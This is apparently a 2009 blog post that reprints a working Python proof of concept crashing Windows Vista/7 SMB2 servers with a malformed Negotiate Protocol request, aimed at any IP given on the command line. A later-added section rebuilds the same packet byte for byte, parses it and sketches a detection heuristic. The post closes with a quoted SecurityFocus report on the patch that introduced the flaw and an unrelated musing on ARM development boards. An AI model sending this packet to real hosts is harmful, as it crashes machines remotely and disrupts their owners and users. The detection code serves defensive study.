
Friday, September 11, 2009

Windows Vista/7 SMB2 Negotiate Protocol Request remote BSOD P.O.C

#!/usr/bin/python
# When SMB2.0 receives a "&" (0x26) byte in the "Process Id High" SMB header field of a
# Negotiate Protocol request it dies with a PAGE_FAULT_IN_NONPAGED_AREA bugcheck.
# modded by knife to pass command line arg for IP.. wuttup priv
import sys
from socket import socket

if len(sys.argv) >= 2:
    host = (sys.argv[1], 445)
    buff = (
        b"\x00\x00\x00\x90"  # NetBIOS session message, 0x90 = 144 bytes follow
        b"\xff\x53\x4d\x42"  # Server Component: SMB ("\xffSMB")
        b"\x72\x00\x00\x00"  # Command 0x72: Negotiate Protocol, then first 3 NT status bytes
        b"\x00\x18\x53\xc8"  # last NT status byte, Flags 0x18, Flags2 0xc853 (little-endian)
        b"\x00\x26"          # Process ID High: 0x2600 --> :) normal value should be
                             # "\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"  # signature (8), reserved (2), TID 0xffff, PID 0xfeff
        b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"  # UID, MID, WordCount 0, ByteCount 0x6d, dialect list:
        b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"  # "PC NETWORK PROGRAM 1.0"
        b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"  # "LANMAN1.0"
        b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"  # "Windows for Workgroups 3.1a"
        b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
        b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"  # "LM1.2X002", "LANMAN2.1"
        b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"  # "NT LM 0.12"
        b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"  # "SMB 2.002": makes srv2.sys handle the request
        b"\x30\x30\x32\x00"
    )

    s = socket()
    s.connect(host)
    s.sendall(buff)  # a single negotiate request is enough; the target crashes on receipt
    s.close()
else:
    sys.exit("Specify an IP.")

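To see exactly where that "&" sits in the packet, here is an added example (mine, written for this page in Python 3; it is not part of the PoC above and not Gaffié's code) that builds the same Negotiate Protocol request from named header fields with struct, parses it back, and applies a simple wire-level check. POC_PACKET is the byte string copied from the PoC above and is only used as offline input; the looks_like_poc heuristic is my own assumption (nonzero PIDHigh in a Negotiate that offers the "SMB 2.002" dialect), not something the post states, and a real detector would need to see the whole TCP stream.

```python
import struct

# Bytes of the PoC request as printed in the post above (NetBIOS session
# header + SMB header + SMB_COM_NEGOTIATE body); used here only as offline input.
POC_PACKET = (
    b"\x00\x00\x00\x90"
    b"\xff\x53\x4d\x42"
    b"\x72\x00\x00\x00"
    b"\x00\x18\x53\xc8"
    b"\x00\x26"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"
)

SMB_COM_NEGOTIATE = 0x72
# 32-byte SMB (CIFS) header, little-endian: protocol id, command, NT status,
# flags, flags2, PIDHigh, security signature, reserved, TID, PIDLow, UID, MID.
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")

# Dialect list from the PoC, in order; each is sent as 0x02 + name + NUL.
DIALECTS = [
    b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
    b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12", b"SMB 2.002",
]


def build_negotiate(pid_high=0, dialects=DIALECTS):
    """Build a NetBIOS-framed SMB_COM_NEGOTIATE request.

    Flags, Flags2, TID and PIDLow are the constants used in the PoC.
    pid_high=0 is the normal value; pid_high=0x2600 reproduces the "\\x00\\x26"
    (the "&" byte) that the post says crashes the SMB2 server.
    """
    header = SMB_HEADER.pack(b"\xffSMB", SMB_COM_NEGOTIATE, 0, 0x18, 0xc853,
                             pid_high, b"\x00" * 8, 0, 0xffff, 0xfeff, 0, 0)
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    smb = header + struct.pack("<BH", 0, len(body)) + body   # WordCount=0, ByteCount
    # NetBIOS session message: type byte 0x00 followed by a 24-bit big-endian length,
    # which is what packing the length as a big-endian uint32 produces for len < 2**24.
    return struct.pack(">I", len(smb)) + smb


def parse_negotiate(pkt):
    """Parse framing, SMB header and dialect list; raise ValueError on malformed input."""
    if len(pkt) < 4 + SMB_HEADER.size + 3:
        raise ValueError("too short for an SMB negotiate request")
    nb_type, nb_len = pkt[0], int.from_bytes(pkt[1:4], "big")
    if nb_type != 0 or nb_len != len(pkt) - 4:
        raise ValueError("bad NetBIOS session header")
    (proto, command, status, flags, flags2, pid_high, _sig, _reserved,
     tid, pid_low, uid, mid) = SMB_HEADER.unpack_from(pkt, 4)
    if proto != b"\xffSMB":
        raise ValueError("not an SMB1 header")
    word_count, byte_count = struct.unpack_from("<BH", pkt, 4 + SMB_HEADER.size)
    data_off = 4 + SMB_HEADER.size + 3 + 2 * word_count   # skip parameter words
    data = pkt[data_off:data_off + byte_count]
    if len(data) != byte_count:
        raise ValueError("ByteCount runs past the end of the packet")
    dialects = [d[1:] for d in data.split(b"\x00") if d.startswith(b"\x02")]
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "pid_high": pid_high, "tid": tid, "pid_low": pid_low, "uid": uid,
            "mid": mid, "byte_count": byte_count, "dialects": dialects}


def looks_like_poc(pkt):
    """Heuristic (my assumption, not from the post): a Negotiate Protocol request
    that offers the SMB 2.002 dialect while carrying a nonzero PIDHigh.  Normal
    clients send PIDHigh = 0 here, so this is a cheap flag for the crash trigger."""
    try:
        fields = parse_negotiate(pkt)
    except ValueError:
        return False
    return (fields["command"] == SMB_COM_NEGOTIATE and fields["pid_high"] != 0
            and b"SMB 2.002" in fields["dialects"])


if __name__ == "__main__":
    assert build_negotiate(pid_high=0x2600) == POC_PACKET
    fields = parse_negotiate(POC_PACKET)
    print("PIDHigh=0x%04x dialects=%s" % (fields["pid_high"], fields["dialects"]))
    print("looks like the PoC:", looks_like_poc(POC_PACKET))
    print("benign request flagged:", looks_like_poc(build_negotiate(pid_high=0)))
```

Nothing here touches the network; the point is that the builder reproduces the PoC byte for byte, so you can read off that the only thing separating the crash packet from a benign SMB1 negotiate that advertises "SMB 2.002" is the two PIDHigh bytes at offset 12 of the SMB header.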

HAHA, supposedly Microsoft opened this gaping security hole in SMB2 with a patch released in 2007 that fixed a different, less critical vulnerability.

From SecurityFocus:

"Laurent Gaffié -- the researcher that disclosed a critical flaw in Microsoft's Server Message Block (SMB) version 2 code earlier this week -- said that further research pinpointed the specific patch that added the vulnerability to Windows Vista. The patch, which fixed a remote execution flaw in SMBv2 signing, was rated Important by Microsoft because the vulnerable feature was not turned on by default. The vulnerability that the patch allegedly introduced could allow an attacker to exploit an affected system in its default configuration, which usually merits a Critical rating from Microsoft."

+++

Today a link to http://buglabs.net was posted in our channel. It looks slick and easy to use, and uses an ARM microprocessor. ALL great things, but is it worth it? As a more knowledgeable comrade suggested... could you not just buy an ARM development kit such as this one? And if a programmable touchscreen with simple audio in/outs and Linux is all you are after... why not a Google development phone? The first Android development editions came out late last year, and there is already much support and code. I currently play with the Arduino chip with a shitty ATmega microcontroller, so I am in the market for something of this nature. A lot to consider, but the BugLabs just seems to be gimmicky :( it reminds me of MAC. heh

MORE TO COME ON THIS TOPIC!
